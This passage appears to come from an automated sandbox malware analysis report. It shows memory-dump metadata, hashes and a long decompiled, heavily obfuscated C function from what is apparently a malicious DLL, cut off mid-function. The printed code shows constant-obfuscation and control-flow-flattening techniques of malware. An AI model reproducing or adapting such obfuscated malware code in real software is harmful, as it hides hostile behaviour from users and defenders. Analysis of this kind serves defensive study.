                                                                                                                                                                                      0x003e565c
                                                                                                                                                                                      0x003e565f
                                                                                                                                                                                      0x003e5666
                                                                                                                                                                                      0x003e566d
                                                                                                                                                                                      0x003e5672
                                                                                                                                                                                      0x003e5679
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e557c
                                                                                                                                                                                      0x003e5582
                                                                                                                                                                                      0x003e5622
                                                                                                                                                                                      0x003e5627
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e5588
                                                                                                                                                                                      0x003e558e
                                                                                                                                                                                      0x003e55d4
                                                                                                                                                                                      0x003e55dd
                                                                                                                                                                                      0x003e55dd
                                                                                                                                                                                      0x003e55e0
                                                                                                                                                                                      0x003e55e3
                                                                                                                                                                                      0x003e55e6
                                                                                                                                                                                      0x003e55eb
                                                                                                                                                                                      0x003e55f0
                                                                                                                                                                                      0x003e55f0
                                                                                                                                                                                      0x003e55fb
                                                                                                                                                                                      0x003e5699
                                                                                                                                                                                      0x003e5601
                                                                                                                                                                                      0x003e5601
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e5601
                                                                                                                                                                                      0x003e5590
                                                                                                                                                                                      0x003e5596
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e559c
                                                                                                                                                                                      0x003e55ba
                                                                                                                                                                                      0x003e55bf
                                                                                                                                                                                      0x003e55c4
                                                                                                                                                                                      0x003e55ca
                                                                                                                                                                                      0x003e5388
                                                                                                                                                                                      0x003e5388
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e5388
                                                                                                                                                                                      0x003e5388
                                                                                                                                                                                      0x003e55c4
                                                                                                                                                                                      0x003e5596
                                                                                                                                                                                      0x003e558e
                                                                                                                                                                                      0x003e5582
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e5685
                                                                                                                                                                                      0x003e5685
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003e5691

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: AB$ K$({$1$1jX$;K;$RSM$a>F$f$|0$vQ${
                                                                                                                                                                                      • API String ID: 0-3105251626
                                                                                                                                                                                      • Opcode ID: f72ab67b060bdeb5c5100df2b316be4e3dce0d93c21fded13423cce132b86609
                                                                                                                                                                                      • Instruction ID: a1785b360008d14358cdb229ae2b860d4c79723339b56572d383cf9fab988b45
                                                                                                                                                                                      • Opcode Fuzzy Hash: f72ab67b060bdeb5c5100df2b316be4e3dce0d93c21fded13423cce132b86609
                                                                                                                                                                                      • Instruction Fuzzy Hash: AB2257B1509380DFD369CF26C589A5FBBE1FBC4708F108A0DE6998A260D7B19949CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                                                      			E003F0C66(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                                      				char _v4;
                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                      				signed int _v60;
                                                                                                                                                                                      				signed int _v64;
                                                                                                                                                                                      				signed int _v68;
                                                                                                                                                                                      				signed int _v72;
                                                                                                                                                                                      				signed int _v76;
                                                                                                                                                                                      				signed int _v80;
                                                                                                                                                                                      				signed int _v84;
                                                                                                                                                                                      				signed int _v88;
                                                                                                                                                                                      				signed int _v92;
                                                                                                                                                                                      				signed int _v96;
                                                                                                                                                                                      				signed int _v100;
                                                                                                                                                                                      				signed int _v104;
                                                                                                                                                                                      				signed int _v108;
                                                                                                                                                                                      				signed int _v112;
                                                                                                                                                                                      				signed int _v116;
                                                                                                                                                                                      				signed int _v120;
                                                                                                                                                                                      				signed int _v124;
                                                                                                                                                                                      				unsigned int _v128;
                                                                                                                                                                                      				signed int _v132;
                                                                                                                                                                                      				signed int _v136;
                                                                                                                                                                                      				signed int _v140;
                                                                                                                                                                                      				signed int _v144;
                                                                                                                                                                                      				signed int _v148;
                                                                                                                                                                                      				signed int _v152;
                                                                                                                                                                                      				unsigned int _v156;
                                                                                                                                                                                      				signed int _v160;
                                                                                                                                                                                      				signed int _v164;
                                                                                                                                                                                      				signed int _v168;
                                                                                                                                                                                      				signed int _v172;
                                                                                                                                                                                      				signed int _v176;
                                                                                                                                                                                      				signed int _v180;
                                                                                                                                                                                      				signed int _v184;
                                                                                                                                                                                      				signed int _v188;
                                                                                                                                                                                      				signed int _v192;
                                                                                                                                                                                      				signed int _v196;
                                                                                                                                                                                      				signed int _v200;
                                                                                                                                                                                      				signed int _v204;
                                                                                                                                                                                      				intOrPtr _v208;
                                                                                                                                                                                      				signed int _v212;
                                                                                                                                                                                      				signed int _v216;
                                                                                                                                                                                      				signed int _v220;
                                                                                                                                                                                      				signed int _v224;
                                                                                                                                                                                      				signed int _v228;
                                                                                                                                                                                      				signed int _v232;
                                                                                                                                                                                      				signed int _v236;
                                                                                                                                                                                      				signed int _v240;
                                                                                                                                                                                      				signed int _v244;
                                                                                                                                                                                      				signed int _v248;
                                                                                                                                                                                      				signed int _v252;
                                                                                                                                                                                      				signed int _v256;
                                                                                                                                                                                      				signed int _v260;
                                                                                                                                                                                      				signed int _v264;
                                                                                                                                                                                      				signed int _v268;
                                                                                                                                                                                      				signed int _v272;
                                                                                                                                                                                      				void* _t569;
                                                                                                                                                                                      				void* _t616;
                                                                                                                                                                                      				void* _t620;
                                                                                                                                                                                      				intOrPtr _t623;
                                                                                                                                                                                      				void* _t628;
                                                                                                                                                                                      				void* _t631;
                                                                                                                                                                                      				void* _t639;
                                                                                                                                                                                      				void* _t643;
                                                                                                                                                                                      				intOrPtr _t649;
                                                                                                                                                                                      				void* _t668;
                                                                                                                                                                                      				void* _t706;
                                                                                                                                                                                      				signed int _t721;
                                                                                                                                                                                      				void* _t722;
                                                                                                                                                                                      				signed int _t724;
                                                                                                                                                                                      				signed int _t725;
                                                                                                                                                                                      				signed int _t726;
                                                                                                                                                                                      				signed int _t727;
                                                                                                                                                                                      				signed int _t728;
                                                                                                                                                                                      				signed int _t729;
                                                                                                                                                                                      				signed int _t730;
                                                                                                                                                                                      				signed int _t731;
                                                                                                                                                                                      				signed int _t732;
                                                                                                                                                                                      				signed int _t733;
                                                                                                                                                                                      				signed int _t734;
                                                                                                                                                                                      				signed int _t735;
                                                                                                                                                                                      				void* _t736;
                                                                                                                                                                                      				void* _t739;
                                                                                                                                                                                      				signed int* _t741;
                                                                                                                                                                                      				void* _t744;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t649 = __ecx;
                                                                                                                                                                                      				_push(_a20);
                                                                                                                                                                                      				_v208 = __ecx;
                                                                                                                                                                                      				_push(_a16);
                                                                                                                                                                                      				_push(_a12);
                                                                                                                                                                                      				_push(0x20);
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                      				E003D8002(_t569);
                                                                                                                                                                                      				_v252 = 0xb850c4;
                                                                                                                                                                                      				_t741 =  &(( &_v272)[7]);
                                                                                                                                                                                      				_v252 = _v252 + 0xffff1b87;
                                                                                                                                                                                      				_t739 = 0;
                                                                                                                                                                                      				_t643 = 0x31427ed;
                                                                                                                                                                                      				_t724 = 0x38;
                                                                                                                                                                                      				_v252 = _v252 / _t724;
                                                                                                                                                                                      				_v252 = _v252 | 0x7484239e;
                                                                                                                                                                                      				_v252 = _v252 ^ 0x7487679f;
                                                                                                                                                                                      				_v228 = 0x671610;
                                                                                                                                                                                      				_v228 = _v228 << 9;
                                                                                                                                                                                      				_v228 = _v228 + 0xffffbdb7;
                                                                                                                                                                                      				_t721 = 0x48;
                                                                                                                                                                                      				_v228 = _v228 / _t721;
                                                                                                                                                                                      				_v228 = _v228 ^ 0x02dd0dbe;
                                                                                                                                                                                      				_v248 = 0x6d45a8;
                                                                                                                                                                                      				_v248 = _v248 ^ 0xcdaaf4a8;
                                                                                                                                                                                      				_v248 = _v248 | 0x2aa6e37d;
                                                                                                                                                                                      				_v248 = _v248 >> 0xc;
                                                                                                                                                                                      				_v248 = _v248 ^ 0x000efe7f;
                                                                                                                                                                                      				_v56 = 0x1d0414;
                                                                                                                                                                                      				_v56 = _v56 ^ 0xe63e9f7a;
                                                                                                                                                                                      				_v56 = _v56 ^ 0xe6239b6e;
                                                                                                                                                                                      				_v196 = 0xdbff9;
                                                                                                                                                                                      				_v196 = _v196 + 0xffffdf67;
                                                                                                                                                                                      				_v196 = _v196 >> 9;
                                                                                                                                                                                      				_v196 = _v196 ^ 0x000006cf;
                                                                                                                                                                                      				_v88 = 0xee2915;
                                                                                                                                                                                      				_t725 = 0x5a;
                                                                                                                                                                                      				_v88 = _v88 / _t725;
                                                                                                                                                                                      				_v88 = _v88 ^ 0x0002a56f;
                                                                                                                                                                                      				_v256 = 0x30f311;
                                                                                                                                                                                      				_t726 = 0x7d;
                                                                                                                                                                                      				_v256 = _v256 * 0x6c;
                                                                                                                                                                                      				_v256 = _v256 / _t726;
                                                                                                                                                                                      				_v256 = _v256 + 0xffff130d;
                                                                                                                                                                                      				_v256 = _v256 ^ 0x00295de4;
                                                                                                                                                                                      				_v268 = 0xd74e11;
                                                                                                                                                                                      				_v268 = _v268 >> 0xb;
                                                                                                                                                                                      				_v268 = _v268 + 0x536c;
                                                                                                                                                                                      				_v268 = _v268 + 0xffff4a38;
                                                                                                                                                                                      				_v268 = _v268 ^ 0xffffb88d;
                                                                                                                                                                                      				_v128 = 0x78165c;
                                                                                                                                                                                      				_v128 = _v128 ^ 0x119f2f8b;
                                                                                                                                                                                      				_v128 = _v128 >> 5;
                                                                                                                                                                                      				_v128 = _v128 ^ 0x008f39ce;
                                                                                                                                                                                      				_v260 = 0x46e0dd;
                                                                                                                                                                                      				_v260 = _v260 * 0x14;
                                                                                                                                                                                      				_v260 = _v260 << 4;
                                                                                                                                                                                      				_v260 = _v260 * 0x3f;
                                                                                                                                                                                      				_v260 = _v260 ^ 0xcdabfbc0;
                                                                                                                                                                                      				_v144 = 0x6701dd;
                                                                                                                                                                                      				_v144 = _v144 ^ 0x9279afad;
                                                                                                                                                                                      				_v144 = _v144 + 0xffff89d5;
                                                                                                                                                                                      				_v144 = _v144 ^ 0x921e3845;
                                                                                                                                                                                      				_v108 = 0x3d44ad;
                                                                                                                                                                                      				_v108 = _v108 >> 1;
                                                                                                                                                                                      				_v108 = _v108 >> 6;
                                                                                                                                                                                      				_v108 = _v108 ^ 0x00007a89;
                                                                                                                                                                                      				_v92 = 0x45ba2c;
                                                                                                                                                                                      				_t727 = 0x62;
                                                                                                                                                                                      				_v92 = _v92 * 0x4a;
                                                                                                                                                                                      				_v92 = _v92 ^ 0x1427283f;
                                                                                                                                                                                      				_v52 = 0x343fab;
                                                                                                                                                                                      				_v52 = _v52 + 0x68e6;
                                                                                                                                                                                      				_v52 = _v52 ^ 0x003405e0;
                                                                                                                                                                                      				_v176 = 0xaf3889;
                                                                                                                                                                                      				_v176 = _v176 ^ 0xc23279d7;
                                                                                                                                                                                      				_v176 = _v176 * 0x1b;
                                                                                                                                                                                      				_v176 = _v176 ^ 0x869c530f;
                                                                                                                                                                                      				_v28 = 0xf4b427;
                                                                                                                                                                                      				_v28 = _v28 | 0x483a8d57;
                                                                                                                                                                                      				_v28 = _v28 ^ 0x48fe78d2;
                                                                                                                                                                                      				_v112 = 0x10db4e;
                                                                                                                                                                                      				_v112 = _v112 ^ 0xf1aff679;
                                                                                                                                                                                      				_v112 = _v112 << 0xa;
                                                                                                                                                                                      				_v112 = _v112 ^ 0xfcbe5c75;
                                                                                                                                                                                      				_v76 = 0x14b737;
                                                                                                                                                                                      				_v76 = _v76 + 0x7c5f;
                                                                                                                                                                                      				_v76 = _v76 ^ 0x0013f1cb;
                                                                                                                                                                                      				_v44 = 0x7484d8;
                                                                                                                                                                                      				_v44 = _v44 * 9;
                                                                                                                                                                                      				_v44 = _v44 ^ 0x04160bfd;
                                                                                                                                                                                      				_v84 = 0x9b7484;
                                                                                                                                                                                      				_v84 = _v84 | 0x5f4a7202;
                                                                                                                                                                                      				_v84 = _v84 ^ 0x5fdf5c37;
                                                                                                                                                                                      				_v168 = 0xda0fbd;
                                                                                                                                                                                      				_v168 = _v168 / _t721;
                                                                                                                                                                                      				_v168 = _v168 * 0x1b;
                                                                                                                                                                                      				_v168 = _v168 ^ 0x0053367e;
                                                                                                                                                                                      				_v68 = 0x2fa43a;
                                                                                                                                                                                      				_v68 = _v68 ^ 0x0df30566;
                                                                                                                                                                                      				_v68 = _v68 ^ 0x0ddaec5a;
                                                                                                                                                                                      				_v32 = 0xc1ec80;
                                                                                                                                                                                      				_v32 = _v32 / _t727;
                                                                                                                                                                                      				_v32 = _v32 ^ 0x000e66f3;
                                                                                                                                                                                      				_v160 = 0x6b4fac;
                                                                                                                                                                                      				_v160 = _v160 + 0x12eb;
                                                                                                                                                                                      				_v160 = _v160 | 0x6651ce0a;
                                                                                                                                                                                      				_v160 = _v160 ^ 0x667f6b6f;
                                                                                                                                                                                      				_v136 = 0x33b0f4;
                                                                                                                                                                                      				_v136 = _v136 ^ 0xd9a5f0ed;
                                                                                                                                                                                      				_v136 = _v136 >> 0xf;
                                                                                                                                                                                      				_v136 = _v136 ^ 0x000f0842;
                                                                                                                                                                                      				_v36 = 0x2a6a0f;
                                                                                                                                                                                      				_v36 = _v36 * 0x2e;
                                                                                                                                                                                      				_v36 = _v36 ^ 0x07936512;
                                                                                                                                                                                      				_v72 = 0x697fd1;
                                                                                                                                                                                      				_v72 = _v72 ^ 0xbf1512e6;
                                                                                                                                                                                      				_v72 = _v72 ^ 0xbf789ab5;
                                                                                                                                                                                      				_v148 = 0xe185e4;
                                                                                                                                                                                      				_v148 = _v148 ^ 0xe5b2acdb;
                                                                                                                                                                                      				_v148 = _v148 + 0xffff9d18;
                                                                                                                                                                                      				_v148 = _v148 ^ 0xe55c8429;
                                                                                                                                                                                      				_v124 = 0x9fa9d1;
                                                                                                                                                                                      				_t728 = 0x5c;
                                                                                                                                                                                      				_v124 = _v124 / _t728;
                                                                                                                                                                                      				_v124 = _v124 + 0xffff2216;
                                                                                                                                                                                      				_v124 = _v124 ^ 0x00077867;
                                                                                                                                                                                      				_v132 = 0x8adf9e;
                                                                                                                                                                                      				_v132 = _v132 + 0x9a5e;
                                                                                                                                                                                      				_v132 = _v132 ^ 0x1a624471;
                                                                                                                                                                                      				_v132 = _v132 ^ 0x1ae76519;
                                                                                                                                                                                      				_v64 = 0x313708;
                                                                                                                                                                                      				_v64 = _v64 | 0x04d552f5;
                                                                                                                                                                                      				_v64 = _v64 ^ 0x04f75265;
                                                                                                                                                                                      				_v240 = 0xb80a70;
                                                                                                                                                                                      				_v240 = _v240 + 0x66b6;
                                                                                                                                                                                      				_v240 = _v240 | 0x1a350fc1;
                                                                                                                                                                                      				_v240 = _v240 + 0xffffcc70;
                                                                                                                                                                                      				_v240 = _v240 ^ 0x1abc6eb5;
                                                                                                                                                                                      				_v140 = 0x2912e7;
                                                                                                                                                                                      				_v140 = _v140 | 0xe2603e46;
                                                                                                                                                                                      				_v140 = _v140 + 0x7e97;
                                                                                                                                                                                      				_v140 = _v140 ^ 0xe265e9db;
                                                                                                                                                                                      				_v116 = 0x821ea6;
                                                                                                                                                                                      				_t729 = 0x2c;
                                                                                                                                                                                      				_v116 = _v116 * 0x36;
                                                                                                                                                                                      				_v116 = _v116 + 0x5511;
                                                                                                                                                                                      				_v116 = _v116 ^ 0x1b7bb2e8;
                                                                                                                                                                                      				_v232 = 0xf0e9f8;
                                                                                                                                                                                      				_v232 = _v232 * 0x7a;
                                                                                                                                                                                      				_v232 = _v232 + 0xffff16fe;
                                                                                                                                                                                      				_v232 = _v232 + 0xffff2a1a;
                                                                                                                                                                                      				_v232 = _v232 ^ 0x72ce1a31;
                                                                                                                                                                                      				_v48 = 0xf5efb0;
                                                                                                                                                                                      				_v48 = _v48 + 0xffff94f3;
                                                                                                                                                                                      				_v48 = _v48 ^ 0x00fb4f00;
                                                                                                                                                                                      				_v156 = 0x5ba670;
                                                                                                                                                                                      				_v156 = _v156 * 0x1a;
                                                                                                                                                                                      				_v156 = _v156 >> 0xf;
                                                                                                                                                                                      				_v156 = _v156 ^ 0x000aa99f;
                                                                                                                                                                                      				_v164 = 0xe620a;
                                                                                                                                                                                      				_v164 = _v164 | 0x6cacc763;
                                                                                                                                                                                      				_v164 = _v164 + 0xffff3d7f;
                                                                                                                                                                                      				_v164 = _v164 ^ 0x6caebe8e;
                                                                                                                                                                                      				_v264 = 0x43c5d0;
                                                                                                                                                                                      				_v264 = _v264 | 0xb2ae0f18;
                                                                                                                                                                                      				_v264 = _v264 + 0xffff20a5;
                                                                                                                                                                                      				_v264 = _v264 + 0x8e2a;
                                                                                                                                                                                      				_v264 = _v264 ^ 0xb2e472bd;
                                                                                                                                                                                      				_v96 = 0x6313ef;
                                                                                                                                                                                      				_v96 = _v96 + 0x1112;
                                                                                                                                                                                      				_v96 = _v96 ^ 0x006c6cc1;
                                                                                                                                                                                      				_v200 = 0xd4b609;
                                                                                                                                                                                      				_v200 = _v200 / _t729;
                                                                                                                                                                                      				_v200 = _v200 | 0x8315fc57;
                                                                                                                                                                                      				_v200 = _v200 ^ 0x83102fe5;
                                                                                                                                                                                      				_v100 = 0x2b0f3c;
                                                                                                                                                                                      				_v100 = _v100 >> 5;
                                                                                                                                                                                      				_v100 = _v100 ^ 0x00084a15;
                                                                                                                                                                                      				_v24 = 0xb53f51;
                                                                                                                                                                                      				_v24 = _v24 << 0xc;
                                                                                                                                                                                      				_v24 = _v24 ^ 0x53fe8c9e;
                                                                                                                                                                                      				_v60 = 0xdeceb1;
                                                                                                                                                                                      				_v60 = _v60 << 6;
                                                                                                                                                                                      				_v60 = _v60 ^ 0x37b3ff62;
                                                                                                                                                                                      				_v192 = 0x1ce17f;
                                                                                                                                                                                      				_v192 = _v192 * 0x2a;
                                                                                                                                                                                      				_v192 = _v192 >> 0xa;
                                                                                                                                                                                      				_v192 = _v192 ^ 0x000a04b3;
                                                                                                                                                                                      				_v152 = 0x50af57;
                                                                                                                                                                                      				_v152 = _v152 + 0xffffa32e;
                                                                                                                                                                                      				_v152 = _v152 + 0x3d8;
                                                                                                                                                                                      				_v152 = _v152 ^ 0x0055a199;
                                                                                                                                                                                      				_v172 = 0x237ec8;
                                                                                                                                                                                      				_v172 = _v172 << 9;
                                                                                                                                                                                      				_v172 = _v172 | 0x4009841a;
                                                                                                                                                                                      				_v172 = _v172 ^ 0x46f72838;
                                                                                                                                                                                      				_v104 = 0x126ce;
                                                                                                                                                                                      				_v104 = _v104 + 0x6844;
                                                                                                                                                                                      				_v104 = _v104 ^ 0x000df250;
                                                                                                                                                                                      				_v184 = 0x7f89e0;
                                                                                                                                                                                      				_t730 = 0x7c;
                                                                                                                                                                                      				_v184 = _v184 * 0x13;
                                                                                                                                                                                      				_v184 = _v184 + 0x9bdf;
                                                                                                                                                                                      				_v184 = _v184 ^ 0x097566f3;
                                                                                                                                                                                      				_v220 = 0x80e5a4;
                                                                                                                                                                                      				_v220 = _v220 >> 4;
                                                                                                                                                                                      				_v220 = _v220 >> 0xc;
                                                                                                                                                                                      				_v220 = _v220 << 0xb;
                                                                                                                                                                                      				_v220 = _v220 ^ 0x0004633a;
                                                                                                                                                                                      				_v236 = 0xa3af09;
                                                                                                                                                                                      				_v236 = _v236 + 0xd396;
                                                                                                                                                                                      				_v236 = _v236 / _t730;
                                                                                                                                                                                      				_v236 = _v236 << 6;
                                                                                                                                                                                      				_v236 = _v236 ^ 0x005e9d44;
                                                                                                                                                                                      				_v272 = 0xdcaf57;
                                                                                                                                                                                      				_v272 = _v272 >> 0x10;
                                                                                                                                                                                      				_v272 = _v272 + 0xffffbaf3;
                                                                                                                                                                                      				_v272 = _v272 + 0xa902;
                                                                                                                                                                                      				_v272 = _v272 ^ 0x00015b44;
                                                                                                                                                                                      				_v212 = 0xf8cf2f;
                                                                                                                                                                                      				_v212 = _v212 + 0xffff434a;
                                                                                                                                                                                      				_t731 = 0x43;
                                                                                                                                                                                      				_v212 = _v212 / _t731;
                                                                                                                                                                                      				_v212 = _v212 + 0xebc7;
                                                                                                                                                                                      				_v212 = _v212 ^ 0x000808bb;
                                                                                                                                                                                      				_v244 = 0xab67d2;
                                                                                                                                                                                      				_v244 = _v244 + 0xa2f6;
                                                                                                                                                                                      				_v244 = _v244 ^ 0x53709e51;
                                                                                                                                                                                      				_t732 = 0x53;
                                                                                                                                                                                      				_v244 = _v244 * 0x4d;
                                                                                                                                                                                      				_v244 = _v244 ^ 0x39596a5b;
                                                                                                                                                                                      				_v120 = 0xeb205c;
                                                                                                                                                                                      				_t415 =  &_v120; // 0xeb205c
                                                                                                                                                                                      				_v120 =  *_t415 / _t732;
                                                                                                                                                                                      				_v120 = _v120 << 0x10;
                                                                                                                                                                                      				_v120 = _v120 ^ 0xd53d7c47;
                                                                                                                                                                                      				_v204 = 0x928934;
                                                                                                                                                                                      				_t733 = 0x65;
                                                                                                                                                                                      				_v204 = _v204 / _t733;
                                                                                                                                                                                      				_v204 = _v204 << 4;
                                                                                                                                                                                      				_v204 = _v204 ^ 0x00124f63;
                                                                                                                                                                                      				_v180 = 0xfa33d6;
                                                                                                                                                                                      				_v180 = _v180 >> 0xe;
                                                                                                                                                                                      				_v180 = _v180 | 0xba2d9757;
                                                                                                                                                                                      				_v180 = _v180 ^ 0xba2e1214;
                                                                                                                                                                                      				_v80 = 0x3a8b30;
                                                                                                                                                                                      				_v80 = _v80 | 0xac97b1c6;
                                                                                                                                                                                      				_v80 = _v80 ^ 0xacba9565;
                                                                                                                                                                                      				_v188 = 0xb91ef8;
                                                                                                                                                                                      				_v188 = _v188 ^ 0x088b963f;
                                                                                                                                                                                      				_v188 = _v188 >> 8;
                                                                                                                                                                                      				_v188 = _v188 ^ 0x0001fb3d;
                                                                                                                                                                                      				_v40 = 0x2fe7d8;
                                                                                                                                                                                      				_v40 = _v40 + 0xc7f9;
                                                                                                                                                                                      				_v40 = _v40 ^ 0x003a6680;
                                                                                                                                                                                      				_v216 = 0x6f56e7;
                                                                                                                                                                                      				_v216 = _v216 + 0xfffff5e8;
                                                                                                                                                                                      				_t722 = 0xd7342cb;
                                                                                                                                                                                      				_t734 = 0x71;
                                                                                                                                                                                      				_v216 = _v216 / _t734;
                                                                                                                                                                                      				_v216 = _v216 + 0x8f1f;
                                                                                                                                                                                      				_v216 = _v216 ^ 0x0001ab71;
                                                                                                                                                                                      				_v224 = 0x334e4d;
                                                                                                                                                                                      				_v224 = _v224 >> 3;
                                                                                                                                                                                      				_v224 = _v224 << 0xf;
                                                                                                                                                                                      				_t735 = 0x5e;
                                                                                                                                                                                      				_t736 = 0xaa6f2cb;
                                                                                                                                                                                      				_v224 = _v224 / _t735;
                                                                                                                                                                                      				_v224 = _v224 ^ 0x009dce1e;
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                      						do {
                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                      								L3:
                                                                                                                                                                                      								_t744 = _t643 - _t736;
                                                                                                                                                                                      								if(_t744 > 0) {
                                                                                                                                                                                      									break;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(_t744 == 0) {
                                                                                                                                                                                      									_t628 = E003D36B6(_v12, _v264, _v196, _v88, _v8,  &_v20, _v96, _v200, _v100, _v24, _v16, _t649, _v60);
                                                                                                                                                                                      									_t741 =  &(_t741[0xb]);
                                                                                                                                                                                      									__eflags = _t628 - _v256;
                                                                                                                                                                                      									_t706 = 0x43cb520;
                                                                                                                                                                                      									_t649 = _v208;
                                                                                                                                                                                      									_t620 = 0x3c47c30;
                                                                                                                                                                                      									_t643 =  ==  ? 0x43cb520 : 0xf968961;
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									if(_t643 == 0x40b594) {
                                                                                                                                                                                      										E003F296F(_v272, _v212, _v244, _v20, _v120);
                                                                                                                                                                                      										_t741 =  &(_t741[3]);
                                                                                                                                                                                      										_t643 = 0xf968961;
                                                                                                                                                                                      										goto L12;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										if(_t643 == 0x31427ed) {
                                                                                                                                                                                      											_t643 = 0x3ae9152;
                                                                                                                                                                                      											continue;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											if(_t643 == 0x3ae9152) {
                                                                                                                                                                                      												_push(0x3d1648);
                                                                                                                                                                                      												_t631 = E003F0AD3(_v92, _v52, __eflags);
                                                                                                                                                                                      												 *_t741 = 0x3d15c8;
                                                                                                                                                                                      												__eflags = E003D92DD(_t631, _v252, _v112,  &_v16, E003F0AD3(_v176, _v28, __eflags), _v76, _v44, _v84) - _v228;
                                                                                                                                                                                      												_t643 =  ==  ? 0xb82defd : 0xe240aa1;
                                                                                                                                                                                      												E003E2EED(_v168, _v68, _v32, _t631);
                                                                                                                                                                                      												E003E2EED(_v160, _v136, _v36, _t632);
                                                                                                                                                                                      												_t741 =  &(_t741[0xa]);
                                                                                                                                                                                      												_t722 = 0xd7342cb;
                                                                                                                                                                                      												L24:
                                                                                                                                                                                      												_t649 = _v208;
                                                                                                                                                                                      												_t706 = 0x43cb520;
                                                                                                                                                                                      												_t620 = 0x3c47c30;
                                                                                                                                                                                      												_t736 = 0xaa6f2cb;
                                                                                                                                                                                      												goto L25;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												if(_t643 == _t620) {
                                                                                                                                                                                      													_push(_t649);
                                                                                                                                                                                      													_push(_v236);
                                                                                                                                                                                      													_push(_v260);
                                                                                                                                                                                      													_push(_v220);
                                                                                                                                                                                      													_push(_v20);
                                                                                                                                                                                      													_push(_v184);
                                                                                                                                                                                      													_t668 = 0x20;
                                                                                                                                                                                      													_t639 = E003EC678(_t668, _v104);
                                                                                                                                                                                      													_t741 =  &(_t741[6]);
                                                                                                                                                                                      													_t643 = 0x40b594;
                                                                                                                                                                                      													__eflags = _t639 - _v144;
                                                                                                                                                                                      													_t739 =  ==  ? 1 : _t739;
                                                                                                                                                                                      													L12:
                                                                                                                                                                                      													_t649 = _v208;
                                                                                                                                                                                      													goto L1;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													if(_t643 != _t706) {
                                                                                                                                                                                      														goto L25;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														E003DAC44(_v20, _a12, _v192, _a16, _v152, _v268, _v172);
                                                                                                                                                                                      														_t741 =  &(_t741[5]);
                                                                                                                                                                                      														_t649 = _v208;
                                                                                                                                                                                      														_t620 = 0x3c47c30;
                                                                                                                                                                                      														_t643 =  ==  ? 0x3c47c30 : 0x40b594;
                                                                                                                                                                                      														continue;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								L28:
                                                                                                                                                                                      								return _t739;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t643 - 0xb82defd;
                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                      								_push(0x3d1618);
                                                                                                                                                                                      								_t616 = E003D5894(_v124,  &_v8, _v132,  &_v4, _v64, _v240, E003F0AD3(_v72, _v148, __eflags), _v248, _v140, _v16);
                                                                                                                                                                                      								_t741 =  &(_t741[9]);
                                                                                                                                                                                      								__eflags = _t616 - _v56;
                                                                                                                                                                                      								_t643 =  ==  ? 0xc658524 : _t722;
                                                                                                                                                                                      								E003E2EED(_v116, _v232, _v48, _t614);
                                                                                                                                                                                      								goto L24;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__eflags = _t643 - 0xc658524;
                                                                                                                                                                                      								if(_t643 == 0xc658524) {
                                                                                                                                                                                      									_push(_t649);
                                                                                                                                                                                      									_t623 = E003E6F53(_v8);
                                                                                                                                                                                      									__eflags = _t623;
                                                                                                                                                                                      									_v12 = _t623;
                                                                                                                                                                                      									_t643 =  !=  ? _t736 : _t722;
                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									__eflags = _t643 - _t722;
                                                                                                                                                                                      									if(_t643 == _t722) {
                                                                                                                                                                                      										E003D2CF9(_v40, _v216, _v108, _v224, _v16);
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										__eflags = _t643 - 0xf968961;
                                                                                                                                                                                      										if(_t643 != 0xf968961) {
                                                                                                                                                                                      											goto L25;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											E003DF699(_v204, _v12, _v180, _v80, _v188);
                                                                                                                                                                                      											_t741 =  &(_t741[3]);
                                                                                                                                                                                      											_t643 = _t722;
                                                                                                                                                                                      											goto L12;
